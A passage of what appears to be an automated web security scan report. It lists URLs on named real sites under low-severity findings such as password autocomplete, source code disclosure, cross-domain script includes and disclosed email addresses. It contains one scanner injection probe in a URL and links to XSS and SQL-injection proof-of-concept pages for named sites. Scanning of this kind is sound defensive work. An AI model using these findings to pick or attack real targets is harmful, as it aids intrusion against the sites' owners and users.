18.319. http://www.millerwelds.com/includes/mootools.js

18.320. http://www.millerwelds.com/includes/swfobject.js

18.321. http://www.millerwelds.com/landing/drive/

18.322. http://www.nike.com/global-landing/content/sport-moment/nikecom_p1/CTA_en_US.jpg

18.323. http://www.nike.com/nsl/services/user/isloggedin

18.324. http://www.powerblockswag.com/ProductDetails.asp

18.325. http://www.powerblockswag.com/ShoppingCart.asp

18.326. http://www.powerblocktv.com/site3/

18.327. http://www.rockyou.com/ajaxticker.php

18.328. http://www.rockyou.com/ctimer/create.php

18.329. http://www.rockyou.com/fxtext/fxtext-create.php

18.330. http://www.rockyou.com/fxtext/hi5Help.php

18.331. http://www.rockyou.com/login.php

18.332. http://www.rockyou.com/show_my_gallery.php

18.333. http://www.rockyou.com/tos.php

18.334. https://www.rockyou.com/login/

18.335. https://www.rockyou.com/login/index.php

18.336. https://www.rockyou.com/resetpassword.php

18.337. http://www.viglink.com/

18.338. https://www.webmaillive.co.uk/Login.aspx

18.339. https://www.websitepanel.co.uk/Default.aspx

18.340. http://www.yankeespirits.com/index.php

18.341. http://www.yankeespirits.com/index.php

18.342. http://www.youtube.com/user/vascodatasecurity10

18.343. http://www.zoomerang.com/Survey/WEB22BZL8ZUMFQ/

18.344. http://www.zoomerang.com/favicon.ico

18.345. http://xcdn.xgraph.net/15530/db/xg.gif

18.346. http://yankeespirits.com/

19. Password field with autocomplete enabled

19.1. http://community.martindale.com/groups/groupdirectory.aspx

19.2. http://community.martindale.com/upgrade-your-connected-account.aspx

19.3. http://digg.com/submit

19.4. http://mail.decaturnet.com/Login.aspx

19.5. http://mail.jayco.net/Login.aspx

19.6. https://secure.webwiz.co.uk/clientarea/

19.7. http://vasco.com/login.aspx

19.8. http://webmail.ngi.it/

19.9. http://webmail.onlyinternet.net/webmail/

19.10. https://www.evri.com/accounts/sign_in

19.11. http://www.humaniplex.com/blogs/

19.12. http://www.humaniplex.com/classifieds/

19.13. http://www.humaniplex.com/clubs/list

19.14. http://www.humaniplex.com/flirts/

19.15. http://www.humaniplex.com/index.html

19.16. http://www.humaniplex.com/mingle/

19.17. http://www.humaniplex.com/profiles/

19.18. http://www.humaniplex.com/user_tools/forgot_password/

19.19. http://www.humaniplex.com/user_tools/join/

19.20. http://www.invisor.net/user/login/

19.21. https://www.leaseweb.com/en/shopping-cart/login

19.22. http://www.martindale.com/ContactUs.aspx

19.23. http://www.martindale.com/Results.aspx

19.24. http://www.martindale.com/Results.aspx

19.25. http://www.martindale.com/all/c-england/all-lawyers-10.htm

19.26. http://www.martindale.com/all/c-england/all-lawyers-10.htm

19.27. http://www.martindale.com/all/c-england/all-lawyers-11.htm

19.28. http://www.martindale.com/all/c-england/all-lawyers-3.htm

19.29. http://www.martindale.com/all/c-england/all-lawyers-4.htm

19.30. http://www.martindale.com/all/c-england/all-lawyers-5.htm

19.31. http://www.martindale.com/all/c-england/all-lawyers-6.htm

19.32. http://www.martindale.com/all/c-england/all-lawyers-7.htm

19.33. http://www.martindale.com/all/c-england/all-lawyers-8.htm

19.34. http://www.martindale.com/all/c-england/all-lawyers-8.htm

19.35. http://www.martindale.com/all/c-england/all-lawyers-9.htm

19.36. http://www.martindale.com/all/c-england/all-lawyers-9.htm

19.37. http://www.martindale.com/all/c-england/all-lawyers.htm

19.38. http://www.martindale.com/all/c-england/all-lawyers.htm

19.39. http://www.mypowerblock.com/main/authorization/signIn

19.40. http://www.mypowerblock.com/main/authorization/signUp

19.41. http://www.ngi.it/

19.42. http://www.ngi.it/EOLO/

19.43. http://www.ngi.it/F4/

19.44. http://www.ngi.it/F4/index.asp

19.45. http://www.ngi.it/F5/

19.46. http://www.ngi.it/F5/listino_F5_FlatTime.asp

19.47. http://www.ngi.it/F6/

19.48. http://www.ngi.it/eolo/eolo_voce.asp

19.49. http://www.ngi.it/eolo/index.asp

19.50. http://www.ngi.it/eolo/prodotto_EOLO.asp

19.51. http://www.ngi.it/f5/index.asp

19.52. http://www.ngi.it/f6/index.asp

19.53. http://www.ngi.it/ipass/

19.54. http://www.ngi.it/ipass/chi.asp

19.55. http://www.ngi.it/ipass/come.asp

19.56. http://www.ngi.it/ipass/contatti.asp

19.57. http://www.ngi.it/ipass/guide/guide.asp

19.58. http://www.ngi.it/ipass/index.asp

19.59. http://www.ngi.it/ipass/licenza.asp

19.60. http://www.ngi.it/ipass/listino.asp

19.61. http://www.ngi.it/ipass/pagamento.asp

19.62. http://www.ngi.it/squillo/

19.63. http://www.ngi.it/squillo/index.asp

19.64. http://www.ngi.it/virtuo/virtuopro.asp

19.65. https://www.ngi.it/

19.66. https://www.ngi.it/EOLO/

19.67. https://www.ngi.it/F4/

19.68. https://www.ngi.it/F5/

19.69. https://www.ngi.it/F6/

19.70. https://www.ngi.it/arAgenti/

19.71. https://www.ngi.it/arDealer/

19.72. https://www.ngi.it/gwHW/accessoriadsl.asp

19.73. https://www.ngi.it/gwHW/adsl4mega.asp

19.74. https://www.ngi.it/gwHW/adsl_voip.asp

19.75. https://www.ngi.it/gwHW/anagrafica.asp

19.76. https://www.ngi.it/gwHW/condizioni.asp

19.77. https://www.ngi.it/gwHW/contatti.asp

19.78. https://www.ngi.it/gwHW/eolo.asp

19.79. https://www.ngi.it/gwHW/faq.asp

19.80. https://www.ngi.it/gwHW/garanzie.asp

19.81. https://www.ngi.it/gwHW/metodipagamento.asp

19.82. https://www.ngi.it/gwHW/portadaptervoip.asp

19.83. https://www.ngi.it/gwHW/resi.asp

19.84. https://www.ngi.it/gwHW/router_hdsl.asp

19.85. https://www.ngi.it/gwHW/router_s_hdsl.asp

19.86. https://www.ngi.it/gwHW/telefonivoip.asp

19.87. https://www.ngi.it/gwHW/wiredadsl.asp

19.88. https://www.ngi.it/gwHW/wirelessadsl.asp

19.89. https://www.ngi.it/gwHw/

19.90. https://www.ngi.it/gwHw/adsl.asp

19.91. https://www.ngi.it/gwHw/error.asp

19.92. https://www.ngi.it/gwHw/hdsl.asp

19.93. https://www.ngi.it/gwHw/isdn.asp

19.94. https://www.ngi.it/gwHw/voip.asp

19.95. https://www.ngi.it/squillo/

19.96. http://www.powerblockswag.com/ShoppingCart.asp

19.97. https://www.powerblockswag.com/login.asp

19.98. http://www.rockyou.com/login.php

19.99. http://www.rockyou.com/login.php

19.100. https://www.rockyou.com/login/

19.101. https://www.rockyou.com/login/

19.102. https://www.rockyou.com/login/

19.103. https://www.rockyou.com/login/index.php

19.104. https://www.rockyou.com/login/index.php

19.105. https://www.rockyou.com/login/index.php

19.106. https://www.rockyou.com/login/index.php

19.107. https://www.rockyou.com/resetpassword.php

19.108. http://www.socialfollow.com/

19.109. http://www.socialfollow.com/

19.110. http://www.socialfollow.com/login.php

19.111. http://www.viglink.com/users/login

19.112. https://www.viglink.com/users/login

19.113. https://www.webmaillive.co.uk/Login.aspx

19.114. https://www.webmaillive.co.uk/Login.aspx

19.115. https://www.webmaillive.co.uk/Login.aspx

19.116. https://www.webmaillive.co.uk/Login.aspx

19.117. https://www.webmaillive.co.uk/Login.aspx

19.118. https://www.webmaillive.co.uk/Login.aspx

19.119. https://www.webmaillive.co.uk/Login.aspx

19.120. https://www.webmaillive.co.uk/Login.aspx

19.121. https://www.webmaillive.co.uk/Login.aspx

19.122. https://www.webmaillive.co.uk/Login.aspx

19.123. https://www.webmaillive.co.uk/Login.aspx

19.124. https://www.webmaillive.co.uk/Login.aspx

19.125. https://www.webmaillive.co.uk/Login.aspx

19.126. https://www.webmaillive.co.uk/Login.aspx

19.127. https://www.webmaillive.co.uk/Login.aspx

19.128. https://www.webmaillive.co.uk/Login.aspx

19.129. https://www.webmaillive.co.uk/Login.aspx/%22ns=%22netsparker(0x00004F)

19.130. https://www.websitepanel.co.uk/Default.aspx

19.131. http://www.yankeespirits.com/index.php

19.132. http://yankeespirits.com/

20. Source code disclosure

20.1. http://vasco.com/

20.2. http://vasco.com/login.aspx

20.3. http://www.gtlaw.com/

20.4. http://www.gtlaw.com/Experience

20.5. http://www.gtlaw.com/Experience/Practices/EconomicCrisisRecovery

20.6. http://www.gtlaw.com/NewsEvents

20.7. http://www.gtlaw.com/NewsEvents/Events

20.8. http://www.gtlaw.com/NewsEvents/Newsroom/PressReleases

20.9. http://www.gtlaw.com/favicon.ico

20.10. http://www.kslaw.com/imageserver/plumtree/common/private/js/jsxml/334989/PTXML.js

20.11. http://www.kslaw.com/imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js

20.12. http://www.millerwelds.com/includes/DD_roundies_0.0.2a-min.js

20.13. http://www.viglink.com/combined.js.h898114336.pack

20.14. https://www.viglink.com/combined.js.h898114336.pack

20.15. http://www.websearchdesign.com/themes/wsd_websearchdesign/css/screen/slim_forms.css

21. Referer-dependent response

21.1. http://ad.doubleclick.net/adi/martindale.ll.ntlresults.dart/

21.2. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/

21.3. http://api.twitter.com/1/statuses/user_timeline.json

21.4. http://c.brightcove.com/services/viewer/federated_f9

21.5. http://fast.fonts.com/d/9b34eab0-8991-4924-94f9-d8aa905064a0.woff

21.6. http://fast.fonts.com/d/c26e7b7a-a788-4ffe-a159-4aee0deb9550.woff

21.7. http://mochibot.com/my/core.swf

21.8. http://www.arnoldporter.com/industries.cfm

21.9. http://www.facebook.com/plugins/likebox.php

21.10. http://www.powerblockswag.com/

21.11. http://www.zoomerang.com/Survey/WEB22BZL8ZUMFQ/

22. Cross-domain POST

23. Cross-domain Referer leakage

23.1. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/ifr

23.2. http://ad.amgdgt.com/ads/

23.3. http://ad.amgdgt.com/ads/

23.4. http://ad.amgdgt.com/ads/

23.5. http://ad.amgdgt.com/ads/

23.6. http://ad.amgdgt.com/ads/

23.7. http://ad.amgdgt.com/ads/

23.8. http://ad.doubleclick.net/adi/N3905.291893.COXDIGITALSOLUTIONS/B5343548

23.9. http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10

23.10. http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10

23.11. http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10

23.12. http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper

23.13. http://adserver.adtechus.com/addyn/3.0/5124/1844672/0/170/ADTECH

23.14. http://apps.io/user-map/IO.php

23.15. http://apps.io/user-map/IO.php

23.16. http://googleads.g.doubleclick.net/pagead/ads

23.17. http://googleads.g.doubleclick.net/pagead/ads

23.18. http://googleads.g.doubleclick.net/pagead/ads

23.19. http://googleads.g.doubleclick.net/pagead/ads

23.20. http://googleads.g.doubleclick.net/pagead/ads

23.21. http://googleads.g.doubleclick.net/pagead/ads

23.22. http://googleads.g.doubleclick.net/pagead/ads

23.23. http://googleads.g.doubleclick.net/pagead/ads

23.24. http://googleads.g.doubleclick.net/pagead/ads

23.25. http://googleads.g.doubleclick.net/pagead/ads

23.26. http://googleads.g.doubleclick.net/pagead/ads

23.27. http://googleads.g.doubleclick.net/pagead/ads

23.28. http://googleads.g.doubleclick.net/pagead/ads

23.29. http://googleads.g.doubleclick.net/pagead/ads

23.30. http://googleads.g.doubleclick.net/pagead/ads

23.31. http://googleads.g.doubleclick.net/pagead/ads

23.32. http://googleads.g.doubleclick.net/pagead/ads

23.33. http://googleads.g.doubleclick.net/pagead/ads

23.34. http://googleads.g.doubleclick.net/pagead/ads

23.35. http://googleads.g.doubleclick.net/pagead/ads

23.36. http://googleads.g.doubleclick.net/pagead/ads

23.37. http://googleads.g.doubleclick.net/pagead/ads

23.38. http://googleads.g.doubleclick.net/pagead/ads

23.39. http://googleads.g.doubleclick.net/pagead/ads

23.40. http://googleads.g.doubleclick.net/pagead/ads

23.41. http://googleads.g.doubleclick.net/pagead/ads

23.42. http://googleads.g.doubleclick.net/pagead/ads

23.43. http://googleads.g.doubleclick.net/pagead/ads

23.44. http://googleads.g.doubleclick.net/pagead/ads

23.45. http://googleads.g.doubleclick.net/pagead/ads

23.46. http://googleads.g.doubleclick.net/pagead/ads

23.47. http://googleads.g.doubleclick.net/pagead/ads

23.48. http://googleads.g.doubleclick.net/pagead/ads

23.49. http://googleads.g.doubleclick.net/pagead/ads

23.50. http://googleads.g.doubleclick.net/pagead/ads

23.51. http://googleads.g.doubleclick.net/pagead/ads

23.52. http://googleads.g.doubleclick.net/pagead/ads

23.53. http://googleads.g.doubleclick.net/pagead/ads

23.54. http://googleads.g.doubleclick.net/pagead/ads

23.55. http://googleads.g.doubleclick.net/pagead/ads

23.56. http://googleads.g.doubleclick.net/pagead/ads

23.57. http://googleads.g.doubleclick.net/pagead/ads

23.58. http://googleads.g.doubleclick.net/pagead/ads

23.59. http://googleads.g.doubleclick.net/pagead/ads

23.60. http://googleads.g.doubleclick.net/pagead/ads

23.61. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

23.62. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

23.63. http://map.yahooapis.jp/MapsService/embedmap/V2/

23.64. http://map.yahooapis.jp/MapsService/embedmap/V2/

23.65. http://map.yahooapis.jp/OpenLocalPlatform/V1/jsapi

23.66. http://map.yahooapis.jp/js/embed.js

23.67. http://maps.google.com/maps

23.68. http://mp.apmebf.com/ad/js/16228-124632-26209-0

23.69. http://mp.apmebf.com/ad/js/16228-124632-26209-0

23.70. http://mp.apmebf.com/ad/js/16228-124632-26209-1

23.71. http://rad.msn.com/ADSAdClient31.dll

23.72. http://scripts.martindale.com/themes/mhc/js/combined-javascript.js

23.73. http://search.twitter.com/search.atom

23.74. http://search.twitter.com/search.atom

23.75. http://search.twitter.com/search.atom

23.76. http://store.nike.com/us/en_us/

23.77. http://technet.microsoft.com/en-us/security/cc308589

23.78. http://technet.microsoft.com/en-us/security/cc308589

23.79. http://www.barracudanetworks.com/ns/

23.80. http://www.curtis.com/sitecontent.cfm

23.81. http://www.evri.com/technology/web

23.82. http://www.facebook.com/plugins/like.php

23.83. http://www.facebook.com/plugins/like.php

23.84. http://www.facebook.com/plugins/likebox.php

23.85. http://www.facebook.com/plugins/likebox.php

23.86. http://www.facebook.com/plugins/likebox.php

23.87. http://www.facebook.com/plugins/likebox.php

23.88. http://www.faegre.co.uk/showlocation.aspx

23.89. http://www.friedfrank.com/index.cfm

23.90. http://www.google.com/search

23.91. http://www.google.com/search

23.92. http://www.google.com/search

23.93. http://www.google.com/search

23.94. http://www.google.com/search

23.95. http://www.google.com/search

23.96. http://www.google.com/url

23.97. http://www.google.com/url

23.98. http://www.google.com/url

23.99. http://www.gtlaw.com/NewsEvents/Newsroom/PressReleases

23.100. http://www.humaniplex.com/tos/site.html

23.101. http://www.invisor.net/management-consultant/

23.102. http://www.livehelpnow.net/lhn/functions/imageserver.ashx

23.103. http://www.martindale.com/Results.aspx

23.104. http://www.martindale.com/Results.aspx

23.105. http://www.martindale.com/all/c-england/all-lawyers-10.htm

23.106. http://www.martindale.com/all/c-england/all-lawyers-10.htm

23.107. http://www.martindale.com/all/c-england/all-lawyers-5.htm

23.108. http://www.martindale.com/all/c-england/all-lawyers-5.htm

23.109. http://www.martindale.com/all/c-england/all-lawyers-5.htm

23.110. http://www.martindale.com/all/c-england/all-lawyers-6.htm

23.111. http://www.martindale.com/all/c-england/all-lawyers-6.htm

23.112. http://www.martindale.com/all/c-england/all-lawyers-7.htm

23.113. http://www.martindale.com/all/c-england/all-lawyers-7.htm

23.114. http://www.martindale.com/all/c-england/all-lawyers-7.htm

23.115. http://www.martindale.com/all/c-england/all-lawyers-7.htm

23.116. http://www.martindale.com/all/c-england/all-lawyers-8.htm

23.117. http://www.martindale.com/all/c-england/all-lawyers-8.htm

23.118. http://www.martindale.com/all/c-england/all-lawyers-9.htm

23.119. http://www.martindale.com/all/c-england/all-lawyers-9.htm

23.120. http://www.martindale.com/all/c-england/all-lawyers.htm

23.121. http://www.martindale.com/all/c-england/all-lawyers.htm

23.122. http://www.martindale.com/all/c-england/all-lawyers.htm

23.123. http://www.mayerbrown.com/careers/index.asp

23.124. http://www.mayerbrown.com/lawyers/profile.asp

23.125. http://www.millerwelds.com/financing/

23.126. http://www.millerwelds.com/landing/drive/

23.127. http://www.mypowerblock.com/groups/group/listForContributor

23.128. http://www.mypowerblock.com/main/authorization/signIn

23.129. http://www.mypowerblock.com/main/authorization/signUp

23.130. http://www.mypowerblock.com/profile/randcali

23.131. http://www.nike.com/nikeos/p/nike/en_US/

23.132. http://www.nike.com/nikeos/p/nikegolf/en_US/

23.133. http://www.powerblockswag.com/PhotoDetails.asp

23.134. http://www.rockyou.com/ctimer/create.php

23.135. http://www.rockyou.com/fxtext/fxtext-create.php

23.136. http://www.rockyou.com/login.php

23.137. http://www.rockyou.com/music/genre-iframe.php

23.138. http://www.rockyou.com/music/quickpicks-iframe.php

23.139. http://www.rockyou.com/show_my_gallery.php

23.140. https://www.rockyou.com/login/

23.141. https://www.rockyou.com/login/index.php

23.142. https://www.rockyou.com/resetpassword.php

23.143. http://www.viglink.com/users/login

23.144. http://www.yankeespirits.com/index.php

23.145. http://www.yankeespirits.com/index.php

23.146. http://www.yankeespirits.com/index.php

23.147. http://www.yankeespirits.com/index.php

23.148. http://www.yankeespirits.com/index.php

23.149. http://www.yankeespirits.com/index.php

23.150. http://www.yankeespirits.com/index.php

24. Cross-domain script include

24.1. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/ifr

24.2. http://ad.amgdgt.com/ads/

24.3. http://ad.amgdgt.com/ads/

24.4. http://ad.amgdgt.com/ads/

24.5. http://ad.amgdgt.com/ads/

24.6. http://ad.amgdgt.com/ads/

24.7. http://ad.amgdgt.com/ads/

24.8. http://ad.doubleclick.net/adi/N3905.291893.COXDIGITALSOLUTIONS/B5343548

24.9. http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10

24.10. http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper

24.11. http://digg.com/submit

24.12. http://googleads.g.doubleclick.net/pagead/ads

24.13. http://googleads.g.doubleclick.net/pagead/ads

24.14. http://googleads.g.doubleclick.net/pagead/ads

24.15. http://googleads.g.doubleclick.net/pagead/ads

24.16. http://googleads.g.doubleclick.net/pagead/ads

24.17. http://home.onlyinternet.net/

24.18. http://home.onlyinternet.net/index.asp

24.19. http://jqueryui.com/themeroller/

24.20. http://oasc05134.247realmedia.com/RealMedia/ads/adstream_jx.ads/LXNXmartindale/finance/1%7BTIME_DATE_STAMP%7D@Right1

24.21. http://oibw.net/

24.22. http://oibw.net/contact.asp

24.23. http://reedgroup.com/contact-us.htm

24.24. https://secure.webwiz.co.uk/clientarea/

24.25. http://securityincidents.org/

24.26. http://securityincidents.org/board.asp

24.27. http://securityincidents.org/faq.asp

24.28. http://securityincidents.org/group.asp

24.29. http://securityincidents.org/howitworks.asp

24.30. http://securityincidents.org/product_analysis_report.asp

24.31. http://securityincidents.org/products.asp

24.32. http://ski.sunweb.co.uk/

24.33. http://technet.microsoft.com/en-us/security/cc308589

24.34. http://vasco.com/company/case_studies/case_studies_overview.aspx

24.35. http://vasco.com/company/contact_sales_represenatative.aspx

24.36. http://vasco.com/company/contactus.aspx

24.37. http://vasco.com/company/other_vasco_websites.aspx

24.38. http://vasco.com/company/sitemap.aspx

24.39. http://vasco.com/images/css/readmore_bg.gif

24.40. http://vasco.com/solutions/solutions_and_solution_partners.aspx

24.41. http://vasco.com/support/support_and_downloads.aspx

24.42. http://vasco.com/verticals/netsecurity/network_access_security.aspx

24.43. http://vasco.com/verticals/oemsolutions/oem_solutions_overview.aspx

24.44. http://www.barracudanetworks.com/ns/

24.45. http://www.curtis.com/sitecontent.cfm

24.46. http://www.duanemorris.com/attorneys/favicon.ico

24.47. http://www.duanemorris.com/attorneys/jeffreyvrodwell.html

24.48. http://www.duanemorris.com/services

24.49. http://www.duanemorris.com/site/contactus.html

24.50. http://www.duanemorris.com/site/favicon.ico

24.51. http://www.facebook.com/plugins/like.php

24.52. http://www.facebook.com/plugins/like.php

24.53. http://www.facebook.com/plugins/likebox.php

24.54. http://www.facebook.com/plugins/likebox.php

24.55. http://www.gtlaw.com/NewsEvents/Newsroom/PressReleases

24.56. http://www.idine.com/

24.57. https://www.idine.com/join.htm

24.58. http://www.invisor.net/

24.59. http://www.invisor.net/blog/

24.60. http://www.invisor.net/contactus/

24.61. http://www.invisor.net/leadership-coaching/

24.62. http://www.invisor.net/leadership-speaker/

24.63. http://www.invisor.net/management-consultant/

24.64. http://www.invisor.net/user/login/

24.65. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud

24.66. http://www.longislanderotic.com/longislanderotic/forum/forum_closed.asp

24.67. http://www.martindale.com/Results.aspx

24.68. http://www.martindale.com/Results.aspx

24.69. http://www.martindale.com/Results.aspx

24.70. http://www.martindale.com/Results.aspx

24.71. http://www.martindale.com/Results.aspx

24.72. http://www.martindale.com/Results.aspx

24.73. http://www.martindale.com/all/c-england/all-lawyers-10.htm

24.74. http://www.martindale.com/all/c-england/all-lawyers-10.htm

24.75. http://www.martindale.com/all/c-england/all-lawyers-10.htm

24.76. http://www.martindale.com/all/c-england/all-lawyers-10.htm

24.77. http://www.martindale.com/all/c-england/all-lawyers-11.htm

24.78. http://www.martindale.com/all/c-england/all-lawyers-11.htm

24.79. http://www.martindale.com/all/c-england/all-lawyers-3.htm

24.80. http://www.martindale.com/all/c-england/all-lawyers-4.htm

24.81. http://www.martindale.com/all/c-england/all-lawyers-4.htm

24.82. http://www.martindale.com/all/c-england/all-lawyers-5.htm

24.83. http://www.martindale.com/all/c-england/all-lawyers-5.htm

24.84. http://www.martindale.com/all/c-england/all-lawyers-5.htm

24.85. http://www.martindale.com/all/c-england/all-lawyers-6.htm

24.86. http://www.martindale.com/all/c-england/all-lawyers-6.htm

24.87. http://www.martindale.com/all/c-england/all-lawyers-7.htm

24.88. http://www.martindale.com/all/c-england/all-lawyers-7.htm

24.89. http://www.martindale.com/all/c-england/all-lawyers-7.htm

24.90. http://www.martindale.com/all/c-england/all-lawyers-7.htm

24.91. http://www.martindale.com/all/c-england/all-lawyers-8.htm

24.92. http://www.martindale.com/all/c-england/all-lawyers-8.htm

24.93. http://www.martindale.com/all/c-england/all-lawyers-8.htm

24.94. http://www.martindale.com/all/c-england/all-lawyers-9.htm

24.95. http://www.martindale.com/all/c-england/all-lawyers-9.htm

24.96. http://www.martindale.com/all/c-england/all-lawyers-9.htm

24.97. http://www.martindale.com/all/c-england/all-lawyers.htm

24.98. http://www.martindale.com/all/c-england/all-lawyers.htm

24.99. http://www.martindale.com/all/c-england/all-lawyers.htm

24.100. http://www.martindale.com/all/c-england/all-lawyers.htm

24.101. http://www.millerwelds.com/about/

24.102. http://www.millerwelds.com/about/certifications.html

24.103. http://www.millerwelds.com/financing/

24.104. http://www.millerwelds.com/landing/drive/

24.105. http://www.millerwelds.com/products/accessories/

24.106. http://www.millerwelds.com/products/accessories/international/

24.107. http://www.millerwelds.com/resources/

24.108. http://www.millerwelds.com/results/blog/

24.109. http://www.millerwelds.com/service/

24.110. http://www.millerwelds.com/wheretobuy/

24.111. http://www.mypowerblock.com/

24.112. http://www.mypowerblock.com/events

24.113. http://www.mypowerblock.com/group/classiccarrestorations

24.114. http://www.mypowerblock.com/groups

24.115. http://www.mypowerblock.com/groups/group/listForContributor

24.116. http://www.mypowerblock.com/main/authorization/signUp

24.117. http://www.mypowerblock.com/page/powerblock-makeover

24.118. http://www.mypowerblock.com/profile/randcali

24.119. http://www.mypowerblock.com/profiles/members/

24.120. http://www.mypowerblock.com/video

24.121. http://www.mypowerblock.com/video/2170052:Video:1098573

24.122. http://www.nike.com/nikeos/p/nikegolf/en_US/

24.123. http://www.powerblockswag.com/

24.124. http://www.powerblockswag.com/11_Xtreme_4x4_Skull_Tee_Charcoal_p/xt-07.htm

24.125. http://www.powerblockswag.com/PhotoDetails.asp

24.126. http://www.powerblockswag.com/ShoppingCart.asp

24.127. https://www.powerblockswag.com/login.asp

24.128. http://www.rewardsnetwork.com/

24.129. http://www.rockyou.com/ctimer/create.php

24.130. http://www.rockyou.com/fxtext/fxtext-create.php

24.131. http://www.rockyou.com/fxtext/hi5Help.php

24.132. http://www.rockyou.com/login.php

24.133. http://www.rockyou.com/music/genre-iframe.php

24.134. http://www.rockyou.com/music/genrelist-iframe.php

24.135. http://www.rockyou.com/music/quickpicks-iframe.php

24.136. http://www.rockyou.com/privacypolicy.php

24.137. http://www.rockyou.com/rymini/

24.138. http://www.rockyou.com/rymini/index.html

24.139. http://www.rockyou.com/show_my_gallery.php

24.140. http://www.rockyou.com/tos.php

24.141. https://www.rockyou.com/login/

24.142. https://www.rockyou.com/login/index.php

24.143. https://www.rockyou.com/resetpassword.php

24.144. http://www.surugadai.org/map/index.html

24.145. http://www.webwiz.co.uk/

24.146. http://www.webwiz.co.uk/hosting/

24.147. http://www.webwiz.co.uk/login/

24.148. http://www.webwiz.co.uk/web-wiz-forums/

24.149. http://www.webwiz.co.uk/web-wiz-forums/forum-compare-editions.htm

24.150. http://www.webwiz.co.uk/web-wiz-forums/forum-pricing.htm

24.151. http://www.youtube.com/user/vascodatasecurity10

24.152. http://www.youtube.com/user/vascodatasecurity10

24.153. http://www3.ipass.com/mobile-employees/find-a-hotspot/

24.154. http://xss.cx/

24.155. http://xss.cx//examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

24.156. http://xss.cx/examples/dork/cookie/xss-cookie-dork-wwwaolcom.cross-site-scripting.html

24.157. http://xss.cx/examples/dork/lawyers/xss-dork-lawyer-cross-site-scripting-curtiscom.html

24.158. http://xss.cx/examples/dork/ldap/ldap-injection-springframework-example.html

24.159. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

24.160. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-dork-leasewebcom.html

24.161. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-vanityfaircom.html

24.162. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-wwwfoxsportsfloridacom-cwe79.html

24.163. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

24.164. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-humaniplexcom.html

24.165. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

24.166. http://xss.cx/examples/dork/xss/xss-dork-msnfoxsportscom-xss-cross-site-scripting.html

24.167. http://xss.cx/examples/dork/xss/xss-foxsportsarizona.com.cross-site-scripting.html

24.168. http://xss.cx/examples/netsparker/boolean-sql-injection-second-order-sqlinjection-wwwinsideupcom.htm

24.169. http://xss.cx/examples/netsparker/stored-xss-permanent-www.ngi.it_443.htm

24.170. http://xss.cx/examples/netsparker/www.ypg.com_80.htm

24.171. http://xss.cx/x/b/blekko.com_443.htm

24.172. http://xss.cx/x/b/xss-cross-site-scripting-cwe79-capec86.blekko.com.html

25. Email addresses disclosed

25.1. http://ads1.msn.com/library/dap.js

25.2. http://apps.io/user-map/IO.php

25.3. http://content.idine.com/m/js/jquery.tablesorter-2.0.3.js

25.4. http://i2.technet.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

25.5. http://mail.decaturnet.com/Login.aspx

25.6. http://mail.jayco.net/Login.aspx

25.7. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/332a/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

25.8. http://modules.nike.com/nikestore/modules/web/xml/orderStatus_globalconfig.xml

25.9. http://oibw.net/contact.asp

25.10. http://reedgroup.com/contact-us.htm

25.11. http://reedgroup.com/news/overview.htm

25.12. http://reedgroup.com/search.js

25.13. http://securityincidents.org/

25.14. http://securityincidents.org/board.asp

25.15. http://securityincidents.org/faq.asp

25.16. http://securityincidents.org/group.asp

25.17. http://securityincidents.org/howitworks.asp

25.18. http://securityincidents.org/javascript/colorbox/jquery.colorbox.js

25.19. http://securityincidents.org/product_analysis_report.asp

25.20. http://securityincidents.org/products.asp

25.21. http://ski.sunweb.co.uk/javascript-shared/shared.js.ashx

25.22. http://static.jquery.com/ui/themeroller/scripts/app.js

25.23. http://static.ning.com/socialnetworkmain/widgets/lib/js/autogrow/jquery.autogrow.js

25.24. http://visitordrive.com/evTracker/includes/prototype.js

25.25. http://visitordrive.com/evTracker/includes/spiffyCal.js

25.26. http://webmail.ngi.it/

25.27. http://widgets.twimg.com/j/2/widget.css

25.28. http://widgets.twimg.com/j/2/widget.js

25.29. http://www.arnoldporter.com/events.cfm

25.30. http://www.barracudanetworks.com/ns/js/wysiwyg/wysiwyg.js

25.31. http://www.curtis.com/scripts/jquery.dimensions.js

25.32. http://www.duanemorris.com/attorneys/jeffreyvrodwell.html

25.33. http://www.duanemorris.com/scripts/contactus.js

25.34. http://www.duanemorris.com/scripts/popup.js

25.35. http://www.duanemorris.com/site/contactus.html

25.36. http://www.faegre.co.uk/js/jquery.colorbox-min.js

25.37. http://www.friedfrank.com/index.cfm

25.38. http://www.friedfrank.com/index.cfm

25.39. http://www.google.com/search

25.40. http://www.gtlaw.com/NewsEvents/Events

25.41. http://www.gtlaw.com/ve/res/widgets/htmlarea4/fckeditor.js

25.42. http://www.idine.com/

25.43. http://www.idine.com/about.htm

25.44. http://www.idine.com/contact.htm

25.45. http://www.idine.com/howitworks.htm

25.46. http://www.idine.com/privacy.htm

25.47. http://www.idine.com/rss-feeds.htm

25.48. http://www.idine.com/terms.htm

25.49. https://www.idine.com/join.htm

25.50. http://www.invisor.net/optimizer.php

25.51. http://www.kslaw.com/offices/Atlanta

